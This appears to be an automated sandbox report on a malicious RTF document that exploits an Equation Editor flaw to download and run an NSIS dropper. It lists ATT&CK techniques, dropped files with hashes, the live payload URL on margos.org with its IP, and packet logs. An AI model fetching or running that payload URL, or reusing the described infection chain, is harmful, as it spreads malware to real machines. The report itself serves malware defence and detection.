    Source: Puportd92.exe, 00000004.00000002.745631325.00000000008D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_037952EA rdtsc
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03796BA0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_03794F83 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379744F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379689E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0379809F RtlAddVectoredExceptionHandler,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\Puportd92.exe C:\Users\user\AppData\Roaming\Puportd92.exe
    Source: C:\Users\user\AppData\Roaming\Puportd92.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts13
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth12
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer122
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets4
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    BL Copy.doc28%VirustotalBrowse
    BL Copy.doc21%ReversingLabsDocument-RTF.Exploit.CVE-2018-0802
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0A92385B-F20B-4105-B494-8D633B606BC4}.tmp100%AviraEXP/CVE-2018-0798.Gen
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SYNT[1].exe5%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsq4443.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsq4443.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\Puportd92.exe5%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    margos.org8%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://margos.org/dda/SYNT.exe12%VirustotalBrowse
    http://margos.org/dda/SYNT.exe100%Avira URL Cloudmalware
    https://bangladeshshoecity.com/im0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    margos.org
    131.153.37.3
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://margos.org/dda/SYNT.exetrue
    • 12%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    4,0,414120409,0000000000089000,00000104,00000010,00020000,00000000,1,0true
      low
      https://bangladeshshoecity.com/imtrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorErrorPuportd92.exe, 00000004.00000002.745588168.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Puportd92.exe, 00000004.00000000.414258604.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Puportd92.exe.2.dr, SYNT[1].exe.2.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        131.153.37.3
        margos.orgUnited States
        20454SSASN2UStrue
        Joe Sandbox Version:34.0.0 Boulder Opal
        Analysis ID:558760
        Start date:24.01.2022
        Start time:13:10:13
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 39s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:BL Copy.doc
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.winDOC@4/13@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 41.6% (good quality ratio 41%)
        • Quality average: 86.8%
        • Quality standard deviation: 21.2%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        TimeTypeDescription
        13:10:20API Interceptor428x Sleep call for process: EQNEDT32.EXE modified
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Category:downloaded
        Size (bytes):95264
        Entropy (8bit):7.521910150341084
        Encrypted:false
        SSDEEP:1536:6/T2X/jN2vxZz0DTHUpouZZb5a6fy2W8utruxlQIj/qrlyZ6PeZuH8k29xE+1Q:6bG7N2kDTHUpouZZbUuy2W8uxuzRQT4o
        MD5:37FC2AA213D1607545A9B876F4AA543E
        SHA1:7DA3E745AC618D2AEE602D1DE1957AA4442C98ED
        SHA-256:4486318D812A32852DB5A4B8BD19DC456890B6C9A1BD03FFE94E2EF189394D90
        SHA-512:BF750937CDE6AF507628A730B34BE52BBA983BE99861F46FD92EBFBC3F4A9C7D30534AC5378E802A0B09BAD8D168450679ABD6D5E5543A8ED88467C051D1A32A
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 5%
        Reputation:low
        IE Cache URL:http://margos.org/dda/SYNT.exe
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................U.....@.............................................(............_...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):900096
        Entropy (8bit):6.03355767758671
        Encrypted:false
        SSDEEP:24576:vY/kDtsyDULLk9iFySeLMu/lUHGguNaUgjg:vj78LkPR1Kmg6R
        MD5:8D94FAB27E6935FF6376285B86DEBEF4
        SHA1:70CC1162934A554997072B2562949800CE6892EB
        SHA-256:77DA522253F20310855BC9619BD29D479954BDDCF86BF56641B5BCC6CAC494D3
        SHA-512:07D20DE4C21561850C9F721659F36427C71B15A00288D837B6AE0096BF7AB1E3B616B7CAA9250D0C033FEF3915E2FB045DC94A3BE528FFD9927064A303460FFB
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):1.3549687709010672
        Encrypted:false
        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb3:IiiiiiiiiifdLloZQc8++lsJe1MzYZ/
        MD5:1B75F87CA07BD845F536D3F0F1C09AC4
        SHA1:547330804AEAF8F94A8338646BD73F52E1580E4F
        SHA-256:08A75D998CCC0666C86A3DD58935E1E80F528D6D5EA13B0528D8D2D74D0E4F00
        SHA-512:5062AEE0CD155A56478A09EE834BD88269908344808521132B28E902CE91E976F91DCDC86EF4153BB65D8C3E4859D381C5472D838299CC528D97E1119B884AB3
        Malicious:false
        Reputation:low
        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):15872
        Entropy (8bit):3.516318069982334
        Encrypted:false
        SSDEEP:384:JGkov9zBATsMRfwAOwHFbTzTOFhb2RfwQJLGvOiVdvQZ:+lzBAwAwAO8iFN2RfwQkGovQZ
        MD5:73D570E2E179B26C6332D721A0CDD691
        SHA1:6C47D6DB6140033306879464B9132AA8091224F3
        SHA-256:2B9134E36148DBC74109A55D39106D773398E965CF5E00A33AA416DCDAA9B8A3
        SHA-512:0AC6C5BF1389B5E8266FD86D190B25699DC0125D823E382DC805AAE171CC1DBBFE4CC79A11DE07609ECFF7B60F2BB764955D7C1466B279351A048FD87832D6D6
        Malicious:false
        Preview:>.5.2.?./.>.?.]...,...?./...6.%.'.%.:.!.).%.>.6.?.3...6.].$.].~.=.6.).?.1.:.:.?.<.4.!.@.?.[.2.3.?.!.;.1.8.@.%.^.4.[.5.?.'.5.0.+.7.2...3.....[.?.;.^.5.#./.4.8.<.7.%.~.).%...6.3.7.0.+.?.%.#.!./.[.*.+.7.~.2.~.(.-.&.'.<.4.<.=.<.'.%.%.<.&.~.[.4.[.<.(.+...<.1.|.4.`.).].9.*.%.?.9.#.|.|.0.&.(.*.@.3...].=...,._.?.!.[...1.2.&.=.+.^.?.9.#.-.`.,.8.?.<.?.2.(.,.../.|.^.#...%.9.!.=.&.~._...>...@.3.0.*.9.[./.&...[.3.8.=.,.8.1.>...].<.?.?.~.0.(.`.+...=.[.|.(.#.?.?._...-.!.).1.:.(...+.#.+.*.&.~.+.7.?.&...?.?.!.;.9...(.-.0.:...|.^.~.2.5.?...?.%...).).'.~.?.?.#.9.?.?.*.*.^.&.....@.,._.>.7.`.1._.?.`.).(.?.*.,.&.`.~.6.#.9.`.`.(.(.)...?.+.).~.?.].>.?.5...2.0...?.5.^.5.8.].7.,...9.?...!.(.^.-.|.^...^.#.5.).^.'.7.].$.9...?.%.+.~.4.<.?.&.4.=.?.8.?.3.>...3.!.6.!.1.'.?.+.`.`.?...?.0.`.?.6.%.2...,...+./.2.3.(.9.-.|.^.=.&.[.6.:.;.-.~.^.2.+.&.7.%.;.%.;...?.*.%.?.).4.0.$...?.7.|...~.#.]...1.?.?.*.~.7.?./.?.%.!./.4.3.|.$.4.%.>...%.?.7.>.%.^.?.].(.,.4.).].0.?.?.3.;.9...4.(.^.9.6./.*.6.?.8.`.6.-.0...$.(.;.?.3.?.@...<.`.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\AppData\Roaming\Puportd92.exe
        File Type:DOS executable (COM)
        Category:dropped
        Size (bytes):33645
        Entropy (8bit):7.620146538761287
        Encrypted:false
        SSDEEP:768:tEn1wCHxTRSJLLV7yueznYuQa6OjAaOIOaW3BISs:8UJ/V7ytYy6oebxIn
        MD5:0614A80093A3722C605EFD8B79692F37
        SHA1:16CBC940F64C331B2AD8F75C1C59321EB7CDEF1D
        SHA-256:FE4DB2C0884A3AD00C2B0D47C119B1293520E35308993870EAC4B211847E7229
        SHA-512:3E4110AC344CCF265F5FB28D247A6AD62D00485D2CC22398012B10E679E4D043FACC0CC1AFD6DA4D565D15304C082684E525490571AB349D963C38A6D669B815
        Malicious:false
        Preview:.W_.?.u.....u.....u........h.U!C.4$...i.4$P.k...$....,$.x...,$lcK.Z1..4.Tf......9.u.W..........T..,..F......j.va...j....}@W.3...........tV=...B...". ..^z.D.:......T..;...nL~..#Kvx.1X..g....O.........z@.W..s-.q..Y.....F......j.va...j....}@W.3...........tV=...B...". ..^z.D.:......T..;...nL~..#Kvx.1X..g....O.........z@.W..s-.q..Y.q.l..6.#H.\:.g!..S.6y...z...V.QB....V!.|7..K$.:..c..T.x...8o.^(!.*..Tf..T...Tfw.......9.f.o."..5f.o....T...q.y.......HlQy.......mzUf...5...#.m.zBZ.p.......#.....`.2.].Tfqc.f..3x.T>qk.g....m....T......T...Tf.c....T..!.B.@.o.g B...#g B.s..og.B.h..0b..*.........).{.0...\f..".y.p...........b...N*:....}i.K...<........%..R.....*%Af...W...c.....h....y....[.B4.2%..v.... F...I.TfA..j.g......9....g....f7sk.g..<.b...m.Uf.\`V....'.......1*D*"H...n...N.Z.(.|....'h.=y$XC......X.;}.../...9.V.....Tf4..H.....E*....a.:....@.*3?.gPB.Bb.y.pr..U.......<........kR..'K.oF.........#...d..R.........R.+e.'*1T.......j.<.T&...f.y.p."t.m2E..9.(...
        Process:C:\Users\user\AppData\Roaming\Puportd92.exe
        File Type:ASCII text, with very long lines, with no line terminators
        Category:dropped
        Size (bytes):16555
        Entropy (8bit):5.9518641421213605
        Encrypted:false
        SSDEEP:384:HpBOk6soHG6Nun3UPBApXPE8eMag91API7ee872UmLZ7:HmkfOG6NNyp/dn19N7U71mLZ
        MD5:695A2030432B3D981B012A42EDCA055A
        SHA1:31283CF8F970E22E7C9B6FCB811B9C1608997211
        SHA-256:F0568B8400FE6F4621B3E62C56B3C3AB9712DD6D30966A348EB3497ACF6B226A
        SHA-512:0095FE21135FCCB9C5723D583C2087FB9D9CD61CB90BB5C96E11EA76469A3744B7F068B7301F7342AF95642D18921763B250FBB9E8F16F5CC9124300E6A97C5C
        Malicious:false
        Preview:EMr8t0Hhq715RQjpV8l9LooUdWJgMtMf2pE83U2wsss81G5KJFLeIXMa1T93HGjNEbFfy4IRaWjctEH1I3hWG74wsJYdZXNmLTqTenvgec8qpu98Zp4XlrrAhbuVePBg5nxMeoxIojglOuJAvAZef0Nak7gm0ix8xSE70QeFJMFjJvEAWRFFFtZOYkcHhCgewp7YBE8OekOsOrcexafRG4AdZaWBz3yCE4qMP0NAcxJ4DHeCdzbc6hW8i8otpHEpw0OGDSzOwMl9VCfHuXXhaw0zVcWRcWKg1sABn5d7OrJ2xhlYvPjqrY5w7z8FN0FgE8XtOgiSbRGN0toQLHc2vjrb52VFWESFWMUHsKSZfQ4PbqkilIzeyLOvDdo44fuucajegzqku9brw7f8p9R2zFXqooBphSkPzHY6XmnyhU3WyDWzX4CroF6xRQXhjjk7OqKFaLu4ORq54CnRXdGfPhd7dzPgYFxqUkZaqo2ckBxUeh3QLr4p1ievUUewtab3AdAT2kjQDq4NVPoAQ5jJvQkApXm49qXhPrvrU2YzKVhY5ajHSj55DsIeOSI066y24ayag5YtldIsnpkasB3iqzZiXwJJSOwZVHVJGChfSumllKT835iwi6k9utWFP5wIpTCqM6CflHh1JSg5HTMqV8fq5VseXa9XzYpdeJu9OBtsanwwES7WtQoLDnmScaoIfCjrIqw61PPDM8QEGM14KrtcVF5ERKQSh6jPyKwNObsN9Ts4FbeSzqr0KnDMekc8p8tRrSRckLbRBa58jfVkjWjcQeuGU8J8gr9f2EG5bdrGEds4pfOwG1TGJcUCr6T8jH9Q82m4wdSeL3wJDr5HYJN0ESkrvn77s4vH90F55tPEmd6ZjNInCzW2BOZfhfO10qNfHa7ZhuyiWVIf05P6uzThDVcRpFtIjVTvGctBTjxS6LEiUlof2CsVigpyEGuXekSTdPsflqGf5sMzKcxKlDJc6mtYp7gIqQODeycT
        Process:C:\Users\user\AppData\Roaming\Puportd92.exe
        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):12288
        Entropy (8bit):5.814115788739565
        Encrypted:false
        SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
        MD5:CFF85C549D536F651D4FB8387F1976F2
        SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
        SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
        SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
        Malicious:false
        Antivirus:
        • Antivirus: Metadefender, Detection: 0%, Browse
        • Antivirus: ReversingLabs, Detection: 0%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Mon Jan 24 20:10:17 2022, length=1786089, window=hide
        Category:dropped
        Size (bytes):999
        Entropy (8bit):4.546161529424097
        Encrypted:false
        SSDEEP:12:8mtrgXg/XAlCPCHaXeBhB/a/X+WvLtKCicvbbI4DtZ3YilMMEpxRljKrcCTd+d//:8mn/XTuzIlLtKJefDv3qSnQd7Qy
        MD5:7EC079A589E223EA710023BA80FA32D0
        SHA1:CF0E1AE03F45A62872CE0AE2C4C3ED7F9461CC5A
        SHA-256:487F10096B7FE25C270236A760E490889609A6B758452B97ECFA34D2CC25A839
        SHA-512:D633F8F196227B61FF01D88D79E926834647A2D8FCDEBEB24988A3BFAB612155164071085C4BB0FBB042BD5B4391793DA774CF2212A114B1674AA29363A77BE7
        Malicious:false
        Preview:L..................F.... ......?......?.......f....@...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..@..8TI. .BLCOPY~1.DOC..D.......S ..S .*.........................B.L. .C.o.p.y...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\BL Copy.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.L. .C.o.p.y...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):65
        Entropy (8bit):4.5744734447445365
        Encrypted:false
        SSDEEP:3:bDuMJl/yK2LUmX1r92LUv:bC04x
        MD5:53214A2BE77F3EF7792D59A4DB8070A1
        SHA1:7F9093E238BFCDA013455621806F51CABA2D3143
        SHA-256:DF3D77E9B39B9D59048D0B409FD17075E83849F65EAFD898C77983CD94ABA0A4
        SHA-512:2D4F8B0BE73BB07917F9F8895B50DD4B75BA9DBAE630944EACF82D95C8E125608AADA799BC61800AEA3DDE94B48B343A4762D0D3005FB394B90C79FA17C3FBFD
        Malicious:false
        Preview:[folders]..Templates.LNK=0..BL Copy.LNK=0..[doc]..BL Copy.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.5038355507075254
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Category:dropped
        Size (bytes):95264
        Entropy (8bit):7.521910150341084
        Encrypted:false
        SSDEEP:1536:6/T2X/jN2vxZz0DTHUpouZZb5a6fy2W8utruxlQIj/qrlyZ6PeZuH8k29xE+1Q:6bG7N2kDTHUpouZZbUuy2W8uxuzRQT4o
        MD5:37FC2AA213D1607545A9B876F4AA543E
        SHA1:7DA3E745AC618D2AEE602D1DE1957AA4442C98ED
        SHA-256:4486318D812A32852DB5A4B8BD19DC456890B6C9A1BD03FFE94E2EF189394D90
        SHA-512:BF750937CDE6AF507628A730B34BE52BBA983BE99861F46FD92EBFBC3F4A9C7D30534AC5378E802A0B09BAD8D168450679ABD6D5E5543A8ED88467C051D1A32A
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 5%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................U.....@.............................................(............_...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.5038355507075254
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        File type:Rich Text Format data, unknown version
        Entropy (8bit):3.541083524495001
        TrID:
        • Rich Text Format (5005/1) 55.56%
        • Rich Text Format (4004/1) 44.44%
        File name:BL Copy.doc
        File size:1786089
        MD5:2fea7c43cd327113333de7ff54800979
        SHA1:b2cf7c97bbfec5b765ee9402f57440910ec89e8b
        SHA256:6ed3aca39d91726d1f16ecb2fa8fc5cc38fa4cce1355bfd5186d2a22769e806c
        SHA512:3d38ba0e9cdad1103a3a90444e9146f740266517ecdccdd09bd340dc71d7834f446e8e7cceb3ce1c9a47921703704eaa75e538f1a07794db267d305b547ba921
        SSDEEP:12288:6mpug3wW7wsQejKAjZOAOZn+K3yZ1b8FIQtV6M7cQEBDnn0YJCru:6mzAW7wsQejK2ZXK+K3O1b8uQpcQW70u
        File Content Preview:{\rtf7737>52?/>?].,.?/.6%'%:!)%>6?3.6]$]~=6)?1::?<4!@?[23?!;18@%^4[5?'50+72.3..[?;^5#/48<7%~)%.6370+?%#!/[*+7~2~(-&'<4<=<'%%<&~[4[<(+.<1|4`)]9*%?9#||0&(*@3.]=.,_?![.12&=+^?9#-`,8?<?2(,./|^#.%9!=&~_.>.@30*9[/&.[38=,81>.]<??~0(`+.=[|(#??_.-!)1:(.+#+*&~+7?&.
        Icon Hash:e4eea2aaa4b4b4a4
        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
        000001D6Ahno
        100001D30hno
        TimestampSource PortDest PortSource IPDest IP
        Jan 24, 2022 13:11:07.756122112 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:07.938119888 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:07.938235044 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:07.938873053 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.121952057 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138510942 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138607979 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138655901 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138699055 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138708115 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138740063 CET4916580192.168.2.22131.153.37.3
        Jan 24, 2022 13:11:08.138752937 CET8049165131.153.37.3192.168.2.22
        Jan 24, 2022 13:11:08.138767958 CET4916580192.168.2.22131.153.37.3
